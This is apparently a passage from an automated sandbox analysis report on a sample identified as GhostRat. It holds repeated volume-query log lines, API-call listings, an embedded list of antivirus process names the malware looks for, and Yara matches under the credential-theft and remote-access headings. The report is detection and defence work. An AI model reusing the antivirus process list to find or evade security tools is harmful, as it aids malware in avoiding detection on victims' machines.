                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeCode function: 0_2_10016BF4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_10016BF4
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D15D22 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,6_2_02D15D22
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D06A70 wsprintfW,GetCurrentProcessId,wsprintfW,_memset,GetVersionExW,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,wsprintfW,6_2_02D06A70
                      Source: FIWszl1A8l.exeBinary or memory string: acs.exe
                      Source: FIWszl1A8l.exeBinary or memory string: kxetray.exe
                      Source: FIWszl1A8l.exeBinary or memory string: avcenter.exe
                      Source: FIWszl1A8l.exeBinary or memory string: vsserv.exe
                      Source: FIWszl1A8l.exeBinary or memory string: KSafeTray.exe
                      Source: FIWszl1A8l.exeBinary or memory string: cfp.exe
                      Source: FIWszl1A8l.exeBinary or memory string: avp.exe
                      Source: FIWszl1A8l.exeBinary or memory string: 360Safe.exe
                      Source: FIWszl1A8l.exeBinary or memory string: 360tray.exe
                      Source: FIWszl1A8l.exeBinary or memory string: rtvscan.exe
                      Source: FIWszl1A8l.exeBinary or memory string: TMBMSRV.exe
                      Source: FIWszl1A8l.exeBinary or memory string: ashDisp.exe
                      Source: FIWszl1A8l.exeBinary or memory string: 360Tray.exe
                      Source: FIWszl1A8l.exeBinary or memory string: avgwdsvc.exe
                      Source: FIWszl1A8l.exeBinary or memory string: AYAgent.aye
                      Source: FIWszl1A8l.exeBinary or memory string: RavMonD.exe
                      Source: FIWszl1A8l.exeBinary or memory string: QUHLPSVC.EXE
                      Source: FIWszl1A8l.exeBinary or memory string: Mcshield.exe
                      Source: FIWszl1A8l.exeBinary or memory string: K7TSecurity.exe

                      Stealing of Sensitive Information

                      barindex
                      Yara detected GhostRat
                      Source: Yara matchFile source: 6.2.FIWszl1A8l.exe.27e1004.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.FIWszl1A8l.exe.43105eb.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.FIWszl1A8l.exe.41b486b.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.FIWszl1A8l.exe.28205bf.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.FIWszl1A8l.exe.27e1004.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.FIWszl1A8l.exe.2fd1053.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.FIWszl1A8l.exe.4142c4b.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.FIWszl1A8l.exe.a5ccab.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.FIWszl1A8l.exe.2d00000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.FIWszl1A8l.exe.a3c1eb.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.FIWszl1A8l.exe.2d00000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.FIWszl1A8l.exe.2fd1053.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.FIWszl1A8l.exe.43105eb.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.FIWszl1A8l.exe.4173e13.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.FIWszl1A8l.exe.a5ccab.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.FIWszl1A8l.exe.3fa4ebb.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.FIWszl1A8l.exe.4173e13.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.FIWszl1A8l.exe.28205bf.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.FIWszl1A8l.exe.a2b043.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.FIWszl1A8l.exe.3fa4ebb.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.FIWszl1A8l.exe.a3c1eb.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.FIWszl1A8l.exe.41b486b.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.FIWszl1A8l.exe.4142c4b.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.2570644353.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.3537866824.0000000004173000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.1775024265.0000000004111000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3791271776.0000000004310000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3789481950.0000000002FD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.2571249345.0000000003F9B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.1743428014.0000000000A2A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.1775024265.0000000004142000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.2529901329.00000000041B4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3786854154.00000000027E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: FIWszl1A8l.exe PID: 7852, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected GhostRat
                      Source: Yara matchFile source: 6.2.FIWszl1A8l.exe.27e1004.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.FIWszl1A8l.exe.43105eb.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.FIWszl1A8l.exe.41b486b.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.FIWszl1A8l.exe.28205bf.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.FIWszl1A8l.exe.27e1004.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.FIWszl1A8l.exe.2fd1053.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.FIWszl1A8l.exe.4142c4b.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.FIWszl1A8l.exe.a5ccab.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.FIWszl1A8l.exe.2d00000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.FIWszl1A8l.exe.a3c1eb.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.FIWszl1A8l.exe.2d00000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.FIWszl1A8l.exe.2fd1053.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.FIWszl1A8l.exe.43105eb.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.FIWszl1A8l.exe.4173e13.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.FIWszl1A8l.exe.a5ccab.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.FIWszl1A8l.exe.3fa4ebb.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.FIWszl1A8l.exe.4173e13.7.raw.unpack, type: UNPACKEDPE
